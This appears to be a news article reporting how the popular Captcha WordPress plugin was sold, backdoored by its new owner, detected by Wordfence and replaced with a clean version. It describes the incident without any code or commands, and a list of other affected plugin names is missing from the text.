A WordPress plugin installed on over 300,000 sites was recently modified to download and install a hidden backdoor. The WordPress team has intervened and removed this plugin from the official WordPress Plugins repository, also providing clean versions for affected customers.
Known only as Captcha, the plugin was one of the most popular CAPTCHA plugins on the official WordPress site and was the work of a well-established plugin developer named BestWebSoft, a company behind many other popular WordPress plugins.
BestWebSoft sold the free version of its Captcha plugin to a new developer named Simply WordPress on September 5, according to a blog post on the company's site.
Exactly three months after the sale, the plugin's new owner shipped Captcha version 4.3.7, which contained malicious code that would connect to the simplywordpress.net domain and download a plugin update package from outside the official WordPress repository (against WordPress.org rules). This sneaky update package would install a backdoor on sites using the plugin.
"This backdoor creates a session with user ID 1 (the default admin user that WordPress creates when you first install it), sets authentication cookies, and then deletes itself," says Matt Barry, Wordfence security researcher. "The backdoor installation code is unauthenticated, meaning anyone can trigger it."
Further, there's also code to trigger a clean update that removes any traces of the back door, just in case the attacker decides to erase all his tracks.
Initially, the update didn't catch anyone's eye and we presume it would have continued to fly under the radar even today.
What exposed the backdoor was not a user complaint but a copyright claim from the WordPress team. A few days ago, the WordPress team removed the Captcha plugin from the official WordPress.org website because the plugin's new author had used the "WordPress" trademark in his name and plugin branding.
The plugin's removal from the WordPress site alerted the security team at Wordfence, a company that provides a powerful Web Application Firewall (WAF) for WordPress sites.
"Whenever the WordPress repository removes a plugin with a large user base, we check to see if it was possibly due to something security-related," Barry says, explaining how they came to review the plugin's code and spot the backdoor.
Once they spotted the backdoor, Wordfence notified the WordPress security team, who then put together a clean version of the Captcha plugin (version 4.4.5), which they immediately started to force-install on all affected websites, removing backdoored versions from users' sites. Over 100,000 sites received the clean version of the Captcha plugin over the weekend, the WordPress team said.
Since first coming across the backdoor, the Wordfence team has relentlessly spent its time looking into the dealings of the Simply WordPress company.
Experts say they've discovered backdoored update packages on the simplywordpress.net domain for other WordPress plugins such as:
None of these names appear to correspond to plugins hosted on the official WordPress repository.
Nonetheless, clues in the simplywordpress.net domain have put the Wordfence team on the trail of a known abuser they have met and exposed in the past.
According to Barry, the Simply WordPress company appears to be connected to Mason Soiza, an individual they have previously linked to backdoors in the Display Widgets (+200,000 installs) and 404 to 301 (70,000 installs).
Wordfence claims Soiza has been buying WordPress plugins and adding backdoor code to each one. Soiza is allegedly using the backdoored versions to insert hidden backlinks to spammy domains, including for Payday Loans, a company he owns. The entire purpose of this business is to help Soiza's sites rank better in search results.